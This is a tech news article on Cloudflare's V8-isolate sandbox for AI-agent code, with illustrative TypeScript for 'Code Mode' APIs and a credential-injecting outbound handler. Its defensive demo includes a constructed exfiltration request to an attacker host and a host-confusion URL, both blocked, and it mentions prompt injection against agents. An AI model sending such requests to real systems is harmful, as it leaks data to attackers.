Every AI agent that generates and executes code needs somewhere safe to run it. You can’t just eval() AI-generated code inside your application: whatever the model emits runs with the application’s full privileges, and a single prompt injection is enough to make it emit something malicious. You need a sandbox: an isolated environment where the code runs with only the specific capabilities it’s meant to have.

Most teams reach for containers. Cloudflare argues that’s the wrong tool for this job.

On March 24, Cloudflare launched Dynamic Workers in open beta — a sandboxing system for AI-generated code that uses V8 isolates instead of Linux containers. The company claims it’s approximately 100x faster to start and 10x to 100x more memory efficient than container-based alternatives. For the growing class of AI agent workloads where code is generated on the fly, executed once, and discarded, that performance gap changes the economics of secure execution.

The Case Against Containers for Agent Code

Containers take hundreds of milliseconds to boot and consume hundreds of megabytes of memory. To avoid cold-start delays, developers keep containers warm, which costs money. To avoid the overhead of starting a new container for each task, they reuse one container across multiple tasks, so code from one task shares a filesystem and process space with the next. That gives up exactly the isolation the sandbox was supposed to provide.

For long-running, persistent workloads, containers work well. For the pattern that AI agents increasingly follow — generate a small piece of code, execute it, return a result, discard the environment — the container model is overbuilt. You’re paying for a full Linux environment when all you need is a JavaScript runtime that starts in milliseconds and disappears when it’s done.

Dynamic Workers use V8 isolates, the isolation primitive of the V8 JavaScript engine that powers Google Chrome and has underpinned the Cloudflare Workers platform for eight years. An isolate starts in a few milliseconds, uses a few megabytes of memory, and can run on the same machine, even the same thread, as the Worker that created it. There is no cross-region hop to find a warm sandbox, and Cloudflare says there are no limits on the number of concurrent sandboxes or on creation rates. Create one for every request, execute, and discard.

Why JavaScript and TypeScript

There’s a catch: The agent needs to write JavaScript. Cloudflare is direct about this constraint and equally direct about why it doesn’t matter.

AI models are fluent in every major programming language, and JavaScript is among the best represented in their training data. More to the point, JavaScript engines were built to run untrusted code from arbitrary web pages, so isolating that code is a design requirement of the runtime rather than something bolted on afterward. That makes it the right language for this job: not because developers prefer it, but because the sandbox is the runtime.

The more interesting argument is about TypeScript as the interface layer. When an AI agent needs to interact with external APIs, it needs to know what is available. MCP defines schemas for flat tool calls but not for programming APIs. OpenAPI describes REST APIs but is verbose. A TypeScript type declaration gives the agent a precise description of an API in very few tokens.

Cloudflare’s approach: expose the API to the sandbox as objects, passed in as method parameters or environment bindings, and hand the model the TypeScript interfaces those objects implement. The Workers Runtime bridges the objects across the security boundary using Cap’n Proto RPC, so the agent calls them as if they were local libraries. Instead of making individual tool calls, the AI writes a program against typed interfaces, which Cloudflare calls “Code Mode.” The company says converting an MCP server into a TypeScript API can cut token usage by 81%.
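As an added example (illustrative TypeScript, not Cloudflare’s code and not the Dynamic Worker Loader API), the following models Code Mode against flat tool calls. A host exposes a constructed BillingApi object whose interface is what the model would be shown, an agent-written program composes calls against it inside the sandbox, and the same task is replayed as one tool call per step. The names, the customer records and the byte counting are assumptions made for the illustration; the real boundary would be Cap’n Proto RPC rather than a direct object reference.

```typescript
// Added example, not Cloudflare's code: a toy model of Code Mode.
// BillingApi, the customer records and the byte counting are constructed.

interface Customer {
  id: string;
  email: string;
  balanceCents: number; // negative: the customer is owed money
}

// The typed surface the agent programs against. This declaration is what
// the model would be shown, in place of an OpenAPI document.
interface BillingApi {
  listCustomers(): Customer[];
  refund(customerId: string, amountCents: number): { ok: boolean };
}

// Constructed sample data standing in for a billing backend.
const CUSTOMERS: Customer[] = [
  { id: "cus_1", email: "a@example.com", balanceCents: 0 },
  { id: "cus_2", email: "b@example.com", balanceCents: -1250 },
  { id: "cus_3", email: "c@example.com", balanceCents: 300 },
  { id: "cus_4", email: "d@example.com", balanceCents: -80 },
];

// Host-side implementation. Every method call is one crossing of the
// sandbox boundary and is recorded; in the real system the object would be
// an RPC stub, but the call shape is the same.
function makeHostApi(boundaryLog: string[]): BillingApi {
  const refunded = new Set<string>();
  return {
    listCustomers(): Customer[] {
      boundaryLog.push("listCustomers");
      return CUSTOMERS.map((c) => ({ ...c }));
    },
    refund(customerId: string, amountCents: number): { ok: boolean } {
      boundaryLog.push(`refund ${customerId} ${amountCents}`);
      const c = CUSTOMERS.find((x) => x.id === customerId);
      if (!c || amountCents <= 0 || refunded.has(customerId)) return { ok: false };
      refunded.add(customerId);
      return { ok: true };
    },
  };
}

// The kind of program a model emits in Code Mode: it composes API calls
// locally and returns only the final value.
function agentProgram(api: BillingApi): string[] {
  const refundedIds: string[] = [];
  for (const c of api.listCustomers()) {
    if (c.balanceCents < 0 && api.refund(c.id, -c.balanceCents).ok) {
      refundedIds.push(c.id);
    }
  }
  return refundedIds;
}

interface RunStats {
  result: string[];
  boundaryCalls: number; // API calls that crossed the sandbox boundary
  modelTurns: number;    // times a result was serialized into the model context
  contextBytes: number;  // bytes of API output the model had to read
}

// Code Mode: one program runs in the sandbox. The customer list never
// enters the model context; only the returned array does.
function runCodeMode(): RunStats {
  const log: string[] = [];
  const result = agentProgram(makeHostApi(log));
  return {
    result,
    boundaryCalls: log.length,
    modelTurns: 1,
    contextBytes: JSON.stringify(result).length,
  };
}

// Flat tool calls: same task, but every API result goes back to the model
// and every refund is a separate model turn.
function runToolMode(): RunStats {
  const log: string[] = [];
  const api = makeHostApi(log);
  const customers = api.listCustomers();
  let modelTurns = 1;
  let contextBytes = JSON.stringify(customers).length; // the model reads the whole list
  const result: string[] = [];
  for (const c of customers) {
    if (c.balanceCents < 0) {
      const r = api.refund(c.id, -c.balanceCents);
      modelTurns += 1;
      contextBytes += JSON.stringify(r).length;
      if (r.ok) result.push(c.id);
    }
  }
  return { result, boundaryCalls: log.length, modelTurns, contextBytes };
}
```

Both runs make the same three API calls and refund the same two customers. What differs is what enters the model’s context: in Code Mode only the returned array (17 bytes here) comes back in a single turn, while the tool-call version serializes the whole customer list and every refund result into the conversation across three turns.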

Security and Credential Isolation

Dynamic Workers inherit the security infrastructure Cloudflare has built over eight years of running its isolate-based platform. According to the company, V8 security patches deploy rapidly, a custom second-layer sandbox adds defense in depth beyond V8’s built-in isolation, and hardware security features provide additional boundaries. Those extra layers matter because isolates in one process share an address space and a kernel: the boundary between them is enforced by V8 itself, so a V8 bug is a potential sandbox escape.

For agents that need to call external HTTP APIs, the Dynamic Worker Loader provides a globalOutbound option that intercepts every outbound request the sandbox makes. The handler runs outside the sandbox, so developers can inspect, rewrite, or block a request before it leaves. That enables credential injection: the agent’s code sends a request without a real credential, and the handler adds the authentication token on the way out, so the agent never sees the secret and cannot leak it.

That pattern should be familiar. IronCurtain uses a similar approach in Docker Mode, where the container receives a fake API key and a proxy swaps it for the real one. Stripe’s Machine Payments Protocol uses Shared Payment Tokens that scope payment authority without exposing credentials. The principle is consistent: Give the agent a capability without giving it the secret.

Setting globalOutbound: null removes network access entirely: the sandbox’s outbound requests have nowhere to go, and it can interact only with the APIs explicitly passed in through its environment. For code that needs nothing but the bindings it was given, that is the right default.
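As an added example, not Cloudflare’s code, the TypeScript below models the decision an outbound handler makes: block, or forward a rewritten copy with the real credential attached. The request shape, the allowlisted host, the header name and both tokens are constructed for the illustration; in the real API the handler is wired in through the loader’s globalOutbound option, and passing null there corresponds to the null policy here.

```typescript
// Added example, not Cloudflare's code: a model of a globalOutbound handler.
// Request shape, hosts, header names and tokens are constructed.

interface OutboundRequest {
  method: string;
  url: string;
  headers: Record<string, string>;
}

type OutboundDecision =
  | { action: "forward"; request: OutboundRequest }
  | { action: "block"; status: number; reason: string };

// One rule per allowed host. The real credential lives here, on the host
// side of the boundary, and is never handed to the sandbox.
interface CredentialRule {
  host: string;
  header: string;
  value: string;
}

// What the agent is told to send. Whatever it puts in the credential header
// is discarded on the way out, so a leaked placeholder is worthless.
const PLACEHOLDER_TOKEN = "sk_placeholder_not_a_secret";

// Constructed policy: a single allowlisted API host with a host-held token.
const DEMO_POLICY: CredentialRule[] = [
  { host: "api.example.com", header: "Authorization", value: "Bearer real-token-held-by-host" },
];

// Strict https host extraction. Anything that does not match (other schemes,
// userinfo tricks such as https://api.example.com@evil.example/) yields null
// and is blocked rather than guessed at.
function hostOf(url: string): string | null {
  const m = /^https:\/\/([^\/:?#@\s]+)(?::\d+)?(?:[\/?#]|$)/i.exec(url);
  const host = m ? m[1] : undefined;
  return host ? host.toLowerCase() : null;
}

// policy === null mirrors globalOutbound: null, where nothing leaves.
function makeOutbound(policy: CredentialRule[] | null) {
  return function outbound(req: OutboundRequest): OutboundDecision {
    if (policy === null) {
      return { action: "block", status: 403, reason: "sandbox has no network access" };
    }
    const host = hostOf(req.url);
    if (host === null) {
      return { action: "block", status: 403, reason: "malformed or non-https URL" };
    }
    const rule = policy.find((r) => r.host.toLowerCase() === host);
    if (!rule) {
      return { action: "block", status: 403, reason: `host ${host} not allowlisted` };
    }
    // Copy headers, dropping anything the sandbox put in the credential header
    // (placeholder, guessed key, or a real key it somehow obtained), then set
    // the real credential. The token is bound to this host by the rule, so the
    // allowlist cannot be used to replay it to another domain.
    const headers: Record<string, string> = {};
    for (const [name, value] of Object.entries(req.headers)) {
      if (name.toLowerCase() !== rule.header.toLowerCase()) headers[name] = value;
    }
    headers[rule.header] = rule.value;
    return { action: "forward", request: { ...req, headers } };
  };
}

// Walk a few constructed requests through the demo policy.
function demo(): OutboundDecision[] {
  const outbound = makeOutbound(DEMO_POLICY);
  return [
    outbound({ method: "GET", url: "https://api.example.com/v1/items",
      headers: { authorization: `Bearer ${PLACEHOLDER_TOKEN}`, accept: "application/json" } }),
    outbound({ method: "POST", url: "https://attacker.example/collect", headers: {} }),
    outbound({ method: "GET", url: "https://api.example.com@attacker.example/x", headers: {} }),
    makeOutbound(null)({ method: "GET", url: "https://api.example.com/", headers: {} }),
  ];
}
```

The first request is forwarded with the agent’s placeholder replaced by the host-held token; the exfiltration attempt, the userinfo host-confusion URL and the null-policy request are all blocked. The check that matters most is the one on the credential header: if the handler merely added the real token without stripping what the sandbox sent, a compromised agent could still smuggle out whatever it had.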

Mitch Ashley, VP and practice lead for software lifecycle engineering at The Futurum Group, confirms, “Cloudflare’s Dynamic Workers positions V8 isolates as the correct execution primitive for AI-generated code, signaling that agent code execution is becoming distinct infrastructure where cold-start latency and memory overhead directly constrain agent throughput and economics. Cloudflare claims isolates start 100x faster and use significantly less memory than containers, numbers that real workloads will validate or qualify over time.”

Ashley continues, “Teams building agent pipelines that generate, execute, and discard code continuously cannot absorb container cold-start penalties at scale. Vendors competing for the agent infrastructure layer who default to containers for disposable code execution will hit throughput and cost ceilings their competitors won’t.”

The Bigger Picture

Sandboxing is emerging as a distinct product category within the AI infrastructure stack. Cloudflare, E2B, Modal, Daytona, Northflank, Docker, and Vercel have all shipped sandbox capabilities in the past year. The approaches span the full isolation spectrum — from Cloudflare’s lightweight isolates to E2B’s Firecracker microVMs to Northflank’s Kata Containers.

The tradeoffs are real. Isolates are fast and lightweight but limited to JavaScript and WebAssembly. Containers support any language and runtime, but are slower and heavier. MicroVMs provide stronger isolation with a dedicated kernel per workload, but incur more overhead. The right choice depends on the workload: short-lived agent code snippets favor isolates, persistent development environments favor containers or microVMs, and untrusted code from external sources may warrant the strongest isolation microVMs provide.

Cloudflare’s bet is that the majority of agent-generated code falls into the first category — small, short-lived, disposable. If AI agents increasingly operate by writing tiny programs against typed APIs rather than making sequential tool calls, then the runtime that can spin up in milliseconds, execute, and vanish has a structural advantage.

The company is positioning this as part of a broader strategy. Dynamic Workers complement Cloudflare’s existing Agents platform, Durable Objects for persistent state, and its work on MCP server hosting. The pitch: the full infrastructure for building, running, and sandboxing AI agents on one network, in hundreds of locations worldwide.

Dynamic Workers are now available in open beta for all paid Workers users via the Dynamic Worker Loader API.